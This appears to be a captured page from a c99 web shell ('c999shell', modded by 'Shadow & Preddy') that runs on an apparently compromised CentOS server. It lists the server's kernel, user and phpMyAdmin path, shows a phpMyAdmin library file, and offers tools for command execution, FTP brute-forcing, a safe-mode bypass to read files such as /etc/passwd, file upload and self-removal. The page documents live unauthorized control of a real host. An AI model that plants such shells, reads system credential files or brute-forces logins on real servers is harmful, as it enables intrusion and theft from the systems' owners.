!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_config.lib.php (2.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
* May 19, 2002 */ /** * Converts attributes of an object to xml code * * Original obj2xml() function by * as found on http://www.php.net/manual/en/function.get-defined-vars.php * Fixed and improved by Robin Johnson * * @param object the source * @param string identication * * @access public */ function obj2xml($v, $indent = '') { $attr = ''; foreach ($v AS $key => $val) { if (is_string($key) && ($key == '__attr')) { continue; } // Check for __attr if (is_object($val->__attr)) { foreach ($val->__attr AS $key2 => $val2) { $attr .= " $key2=\"$val2\""; } } else { $attr = ''; } // Preserve data type information $attr .= ' type="' . gettype($val) . '"'; if (is_array($val) || is_object($val)) { echo "$indent<$key$attr>\n"; obj2xml($val, $indent . ' '); echo "$indent\n"; } else { if (is_string($val) && ($val == '')) { echo "$indent<$key$attr />\n"; } else { echo "$indent<$key$attr>$val\n"; } } } // end while } // end of the "obj2xml()" function $cfg['DBConfig']['AllowUserOverride'] = array( 'Servers/*/bookmarkdb', 'Servers/*/bookmarktable', 'Servers/*/relation', 'Servers/*/pdf_table_position', 'ShowSQL', 'Confirm', 'LeftFrameLight', 'ShowTooltip', 'ShowBlob', 'NavigationBarIconic', 'ShowAll', 'MaxRows', 'Order', 'ProtectBinary', 'ShowFunctionFields', 'LeftWidth', 'LeftBgColor', 'LeftPointerColor', 'RightBgColor', 'Border', 'ThBgcolor', 'BgcolorOne', 'BgcolorTwo', 'BrowsePointerColor', 'BrowseMarkerColor', 'TextareaCols', 'TextareaRows', 'LimitChars', 'ModifyDeleteAtLeft', 'ModifyDeleteAtRight', 'DefaultDisplay', 'RepeatCells' ); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--